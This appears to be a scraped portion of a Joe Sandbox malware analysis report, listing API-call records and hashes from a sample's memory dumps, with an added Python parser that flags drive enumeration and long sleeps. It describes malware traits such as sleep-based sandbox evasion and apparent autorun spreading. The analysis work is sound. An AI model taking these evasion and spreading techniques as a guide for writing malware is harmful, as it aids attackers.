• Opcode Fuzzy Hash: 819e8b5a65f77ab65b4110d1802958d5bc83e8488021e9fafedbd04c30eb492e
• Instruction Fuzzy Hash: 17E048FDA443045BF22467B1F80AF177619975DF56F044426FB0A852A8DAB3F841C762
APIs
• CloseHandle.KERNEL32(00000000), ref: 014424BB
• CloseHandle.KERNEL32(?), ref: 014424DB
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 014424F3
• HeapFree.KERNEL32(00000000), ref: 014424FA
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CloseHandleHeap$FreeProcess
• String ID:
• API String ID: 4176491614-0
• Opcode ID: beb2e2dd7c8e0058aab859e1b3593f4a50c333ca362d27d97fff1ab24b1ca0de
• Instruction ID: d22b6bb30c4f3c20a5ed63b9a0f75895a24034e9d2cf425b4af61d766fac7b3b
• Opcode Fuzzy Hash: beb2e2dd7c8e0058aab859e1b3593f4a50c333ca362d27d97fff1ab24b1ca0de
• Instruction Fuzzy Hash: F3F0EC79D00258CBEB34CFA8D84CBDDB774EB48721F008596EA1992390C7B459D4CF60
APIs
• lstrcpy.KERNEL32(00000000,01432100), ref: 01441D3C
• GetDriveTypeA.KERNEL32(00000000), ref: 01441D55
• RtlExitUserThread.NTDLL(00000000), ref: 01441D80
  • Part of subcall function 01441060: Sleep.KERNEL32(?,?), ref: 014410BF
  • Part of subcall function 01441060: lstrcat.KERNEL32(?,01433D20), ref: 014410DD
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: DriveExitSleepThreadTypeUserlstrcatlstrcpy
• String ID:
• API String ID: 3899959655-0
• Opcode ID: 6458deca08ca0ae4feb9dafda89086e9073e22ad418a50ecda3e5ebac5e36687
• Instruction ID: 694a9954d0939b295e3211b020f126c2d438c07345dc6f64e9db898208126fd1
• Opcode Fuzzy Hash: 6458deca08ca0ae4feb9dafda89086e9073e22ad418a50ecda3e5ebac5e36687
• Instruction Fuzzy Hash: 5211D671A402189FEB25CB69CC04BEAB7B9AB5CF00F0000E9F709A7290D7706B40CF91
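The function records above are easier to triage once they are structured: the Sleep loop at 01441EC6/01441EE0 sleeps for 0x4E20 ms (20 s) and 0x57E40 ms (360 s, six minutes), and the thread at 01441D55 calls GetDriveTypeA before exiting, which is what you would expect from a sample that writes autorun.inf to drives. The following Python parser is an added example, not Joe Sandbox code or output; it reads the "APIs" records in the text form shown on this page, decodes the hex arguments, and tags records that enumerate drive types or sleep for a long time. The sample text is constructed from the two records above, and the 60-second long-sleep threshold is an assumption chosen because sandboxes commonly stop tracing after a few minutes.

```python
"""Parse Joe Sandbox 'APIs' function records (added example, not Joe Sandbox code).

Each bullet is one resolved API call with hex arguments and the call-site
address ('ref'). Calls reached through a subcall carry that subcall's address.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: two records copied from this report (the drive-enumeration
# thread and the Sleep loop), reduced to their APIs sections.
SAMPLE = """\
APIs
• lstrcpy.KERNEL32(00000000,01432100), ref: 01441D3C
• GetDriveTypeA.KERNEL32(00000000), ref: 01441D55
• RtlExitUserThread.NTDLL(00000000), ref: 01441D80
  • Part of subcall function 01441060: Sleep.KERNEL32(?,?), ref: 014410BF
  • Part of subcall function 01441060: lstrcat.KERNEL32(?,01433D20), ref: 014410DD
APIs
• Sleep.KERNEL32(00004E20), ref: 01441EC6
  • Part of subcall function 01441D8F: GetFileAttributesA.KERNEL32(00000000), ref: 01441E3D
  • Part of subcall function 01441D8F: Sleep.KERNEL32(00000100), ref: 01441E73
• Sleep.KERNEL32(00057E40), ref: 01441EE0
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Assumed threshold: a single Sleep of a minute or more is worth flagging.
LONG_SLEEP_MS = 60_000


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # raw hex strings; '?' means the value was not resolved
    ref: int                 # call-site address
    subcall: Optional[int]   # address of the subcall the line belongs to, if any

    def int_arg(self, i: int) -> Optional[int]:
        """Argument i as an int, or None when it is missing or unresolved ('?')."""
        if i >= len(self.args) or self.args[i] == "?":
            return None
        return int(self.args[i], 16)


def parse_records(text: str) -> List[List[Call]]:
    """Split the text at each 'APIs' header and parse the bullets under it."""
    records: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        current.append(Call(m["api"], m["module"], args, int(m["ref"], 16),
                            int(m["sub"], 16) if m["sub"] else None))
    return records


def sleep_ms(record: List[Call]) -> List[int]:
    """Resolved Sleep() durations in a record, in milliseconds, in report order."""
    return [c.int_arg(0) for c in record
            if c.api == "Sleep" and c.int_arg(0) is not None]


def flags(record: List[Call]) -> set:
    """Behaviour tags for one record: drive-type enumeration and long sleeps."""
    out = set()
    if any(c.api == "GetDriveTypeA" for c in record):
        out.add("drive-enum")
    if any(ms >= LONG_SLEEP_MS for ms in sleep_ms(record)):
        out.add("long-sleep")
    return out


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(f"record {i}: {[c.api for c in rec]} "
              f"sleeps={sleep_ms(rec)} flags={sorted(flags(rec))}")
```

Unresolved arguments ("?") are kept as strings and skipped by `sleep_ms`, so the subcall `Sleep.KERNEL32(?,?)` in the drive thread produces no duration rather than a bogus one; the same parser runs unchanged over every other "APIs" block on this page.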
APIs
• RtlEnterCriticalSection.NTDLL(01449030), ref: 014341D6
• CloseHandle.KERNEL32(00000000,?,?,01441722,00000000), ref: 01434247
• RtlLeaveCriticalSection.NTDLL(01449030), ref: 01434260
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$CloseEnterHandleLeave
• String ID:
• API String ID: 2394387412-0
• Opcode ID: 6cb46deeaee6e033954270298ebacf359d9729c0c55039351eed7836657fb5ab
• Instruction ID: 482a73de583927dbf92fb41f096d285271c0d250dba2db43d0d67f9ae66103fb
• Opcode Fuzzy Hash: 6cb46deeaee6e033954270298ebacf359d9729c0c55039351eed7836657fb5ab
• Instruction Fuzzy Hash: 1B118E74500208EFDB20CF94E4487DE7BB1FB8D399F18854AE91527364C7709A81DF40
APIs
• WaitForSingleObject.KERNEL32(?,00000064), ref: 014342B3
• Sleep.KERNEL32(00004E20), ref: 014342D4
• RtlExitUserThread.NTDLL(00000000), ref: 014342DE
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExitObjectSingleSleepThreadUserWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 295063474-0
APIs
  • Part of subcall function 0143A75A: GetTempPathA.KERNEL32(00000080,?,?), ref: 0143A78C
  • Part of subcall function 0143A75A: lstrlen.KERNEL32(?), ref: 0143A796
  • Part of subcall function 0143A75A: lstrcat.KERNEL32(?,01433CC0), ref: 0143A7B2
  • Part of subcall function 0143A75A: lstrcpy.KERNEL32(?,00000000), ref: 0143A7CF
  • Part of subcall function 0143A75A: lstrlen.KERNEL32(?,01432880,?), ref: 0143A7FD
  • Part of subcall function 0143A75A: wsprintfA.USER32 ref: 0143A809
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144302B
• WriteFile.KERNEL32(000000FF,014126B0,00000401,00000000,00000000), ref: 0144304E
• CloseHandle.KERNEL32(000000FF), ref: 01443058
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: Filelstrlen$CloseCreateHandlePathTempWritelstrcatlstrcpywsprintf
• String ID:
• API String ID: 817978534-0
APIs
• GlobalFree.KERNEL32(00000000), ref: 014408E2
• RtlLeaveCriticalSection.NTDLL(01449018), ref: 014408F4
• Sleep.KERNEL32(00000400), ref: 0144090F
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalFreeGlobalLeaveSectionSleep
• String ID:
• API String ID: 2599486065-0
APIs
• IsBadWritePtr.KERNEL32(00000110,?), ref: 01438B3E
• Sleep.KERNEL32(00001770), ref: 01438B8E
• Sleep.KERNEL32(0001D4C0), ref: 01438BB0
• lstrcpy.KERNEL32(?,?), ref: 01438CD2
• Sleep.KERNEL32(004B001E), ref: 01438D9D
• Sleep.KERNEL32(001B7740), ref: 01438DAA
• RtlExitUserThread.NTDLL(00000000), ref: 01438DD0
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: Sleep$ExitThreadUserWritelstrcpy
• String ID:
• API String ID: 3664100127-0
APIs
• QueryDosDeviceW.KERNEL32(00000000,?,00020000,0F4D8B55,2FA62CA8), ref: 00AB123D
  • Part of subcall function 00AB5307: VirtualAlloc.KERNEL32(00000000,00AB62E9,00003000,00000004,?,00AB62E9,00000105), ref: 00AB5324
Strings
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocDeviceQueryVirtual
                                                                                                                                                                                                                                                                                            • String ID: ^;yN
                                                                                                                                                                                                                                                                                            • API String ID: 4189773976-1295057876
                                                                                                                                                                                                                                                                                            • Opcode ID: 90f328a40a59a087d3a60bb317625808acdef10dc43ac180d72fcb15a4a6eab3
                                                                                                                                                                                                                                                                                            • Instruction ID: 44c5332c62062393ae5d24f5b14879737c700cfaa7164073c4d3bfd265544e04
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f328a40a59a087d3a60bb317625808acdef10dc43ac180d72fcb15a4a6eab3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A21F631D0431C6AEB159B94D962BEEBBBCDF40310F5000A9E105A61C3DBB59BC5CBE5
APIs
• RegQueryValueExW.KERNEL32(?,00000104,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 00AB62D9
• RegCloseKey.KERNEL32(850FC084), ref: 00AB632B
  • Part of subcall function 00AB5307: VirtualAlloc.KERNEL32(00000000,00AB62E9,00003000,00000004,?,00AB62E9,00000105), ref: 00AB5324
  • Part of subcall function 00AB538C: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00AB1DBA,00000000), ref: 00AB53AD
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: Virtual$AllocCloseFreeQueryValue
• String ID:
• API String ID: 3311923045-0
• Opcode ID: b797f78465ffec3178f9feced315cfae8816b821409cb8f56e1ee295ab16ba5a
• Instruction ID: 2897212efe97687fb2739c23ac7c0ddd3284c3a39283dd70789a8fda8b522607
• Opcode Fuzzy Hash: b797f78465ffec3178f9feced315cfae8816b821409cb8f56e1ee295ab16ba5a
• Instruction Fuzzy Hash: EF113DB6D00108BEEB059FE4DD82EDEBBBCEF44394F204055F615E6151EA719E40DB50
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2FA62CA8,00000001), ref: 00AB588E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AB58D4
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: CreateFirstProcess32SnapshotToolhelp32
• String ID:
• API String ID: 2353314856-0
• Opcode ID: a8b42a2fe86ae43d3c53eea1046a7b114230e273e528740491d4a444d06e3ad7
• Instruction ID: f2233ce92de202cb097f2941a72e9c6804ea9e860b008878e2431ebefca243c6
• Opcode Fuzzy Hash: a8b42a2fe86ae43d3c53eea1046a7b114230e273e528740491d4a444d06e3ad7
• Instruction Fuzzy Hash: 2FF0AF3290562439E61076F4AC4BFEE37DC8B05364F60025AF526A60D3E9A499856AA1
APIs
• MapViewOfFile.KERNEL32(000001D8,00000006,00000000,00000000,00015400), ref: 0143C8D1
• UnmapViewOfFile.KERNEL32(00000000), ref: 0143C900
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: FileView$Unmap
• String ID:
• API String ID: 3282598733-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8bc153028acd8627fb5f1fcc04e15514c35c8610fb8e9a6c659c32f491764358
                                                                                                                                                                                                                                                                                            • Instruction ID: 40940eb7fbe6f7d5f8a6151e4139faaf088b69423c94e1b8e687d665250887fc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bc153028acd8627fb5f1fcc04e15514c35c8610fb8e9a6c659c32f491764358
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84F0AF74A00308FBDB24DFA8D889B9D7BB8AB48705F20418AFA046B2E4D3B55684CB44
APIs
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,01432104), ref: 014362A8
• MapViewOfFile.KERNEL32(00000204,00000006,00000000,00000000,00008000), ref: 014362CE
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID:
• API String ID: 3452162329-0
• Opcode ID: d263e750b15fe534d6fdfe915ab034265973b529cbce5ef4eda78a71c3327079
• Instruction ID: 89e6f592d155cd1c804e52483329686fae2e15b5c855484a94b67b46a0e24c1d
• Opcode Fuzzy Hash: d263e750b15fe534d6fdfe915ab034265973b529cbce5ef4eda78a71c3327079
• Instruction Fuzzy Hash: 0EF0ACF8680300BBF3309B64FC49B523BA4B308B1CF204105FB155A6E8C6B62448DB54
APIs
• FindClose.KERNEL32(00000000), ref: 014414B5
• Sleep.KERNEL32(00000400), ref: 014414C0
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CloseFindSleep
• String ID:
• API String ID: 1358061995-0
• Opcode ID: 39bb5195b3bb536733debd5a6b56525f44083c163d584d800c3f4a660af85c94
• Instruction ID: 322411ba7cf98757f3e1e5c86f6693ead55882ebd4553c5d25efc3d307a199da
• Opcode Fuzzy Hash: 39bb5195b3bb536733debd5a6b56525f44083c163d584d800c3f4a660af85c94
• Instruction Fuzzy Hash: 31E04F76E00204CFDB20CFA4E8457ADB770FB48621F00426ADA15A2290C7351401CB60
APIs
• GlobalAlloc.KERNEL32(00000040,0001F200), ref: 014437F4
  • Part of subcall function 01442FFF: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144302B
  • Part of subcall function 01442FFF: WriteFile.KERNEL32(000000FF,014126B0,00000401,00000000,00000000), ref: 0144304E
  • Part of subcall function 01442FFF: CloseHandle.KERNEL32(000000FF), ref: 01443058
• Sleep.KERNEL32(00004E20), ref: 01443852
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: File$AllocCloseCreateGlobalHandleSleepWrite
• String ID:
• API String ID: 653111876-0
• Opcode ID: 35cd866dc80d3a8f5c96e66e7bedf515885030c1a9215dcdff6adfbc8be4c7d1
• Instruction ID: 7400da8a9dc9e621428e7f457745a4dd797397175ebe5d6b9837bc051e875276
• Opcode Fuzzy Hash: 35cd866dc80d3a8f5c96e66e7bedf515885030c1a9215dcdff6adfbc8be4c7d1
• Instruction Fuzzy Hash: BB41BBB29001146FE724DB65DC51BE5B3B9BB68700F0045E9E70DA3291DBB56F84CF91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435983
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435AF0
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01435B2D
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01435BFB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wsprintf$CloseQueryValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2158237808-0
APIs
• VirtualAlloc.KERNEL32(00000000,000000B5,00003000,00000004,?,?,00AB1E5E,00AB2BD2,?,?,00AB2BD2,?), ref: 00AB5372
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00AB1DBA,00000000), ref: 00AB53AD
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
